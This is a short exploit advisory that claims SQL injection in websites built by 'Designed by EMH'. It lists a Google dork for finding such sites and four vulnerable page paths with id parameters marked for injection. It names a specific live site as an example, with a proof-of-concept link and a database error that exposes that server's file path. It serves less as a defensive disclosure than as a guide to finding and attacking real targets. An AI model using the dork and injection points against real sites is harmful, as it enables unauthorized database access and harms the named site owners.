#################################################################################################
# Exploit Title : Designed by EMH TheEmhGlobal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/07/2018
# Vendor Homepage : theemhglobal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Designed by EMH''
# Exploit :
/gallery.php?id=[SQL Inj]
/about-us-details.php?id=[SQL Inj]
/certification_details.php?id=[SQL Inj]
/news_details.php?id=[SQL Inj]
#################################################################################################
# Example Site => ghanatimber.org/gallery.php?id=3 => [ Proof of Concept ] => archive.is/lLC6c
# SQL Database Error =>
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in
/home/anatim29/public_html/tm2018_admin/includes/functions.php on line 94
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''3'' order by gal_sort asc' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################